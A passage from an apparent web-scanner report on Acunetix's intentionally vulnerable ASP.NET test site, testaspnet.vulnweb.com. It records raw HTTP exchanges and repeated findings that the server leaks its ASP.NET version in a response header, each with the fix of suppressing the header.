name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (212 bytes)
GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cacheRequest body (0 bytes)
Response Status line and header section (296 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:15 GMT Content-Length: 13912Response body (13912 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/about.aspx
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (314 bytes)
GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:17 GMT Content-Length: 14467Response body (14467 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td 